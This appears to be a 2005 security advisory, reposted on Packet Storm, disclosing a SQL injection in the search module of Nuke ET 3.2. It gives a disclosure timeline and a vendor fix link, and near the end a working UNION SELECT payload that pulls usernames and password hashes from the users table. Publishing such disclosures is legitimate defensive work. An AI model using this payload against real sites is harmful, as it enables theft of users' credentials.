Nuke ET version 3.2 is susceptible to a remote SQL injection vulnerability. Exploit details provided.
6e87a2b4b8c3d665df6e02aeb92a7b4544566df507f4204295d374396fedcca9###############################################
Nuke ET 'search' module 'query' variable SQL injection
Vendor url: www.truzone.org
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2005/11/
nuke-et-search-module-query-variable.html
################################################
Nuke ET have a flaw which can be exploited by malicious people to
conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
Nuke ET 3.2
posible prior versions are afected.
##################
solution:
###################
the vendor has release a fix
http://www.truzone.org/modules.php?name=DescNuke&d_op=getit&lid=1557
aply the fix as fast posible
####################
Timeline
####################
discovered:21-11-2005
vendor notify:21-11-2005
vendor response:21-11-2005
vendor fix:21-11-2005
disclosure:21-11-2005
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
Thnx to Truzone
Thnx to RiXi
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed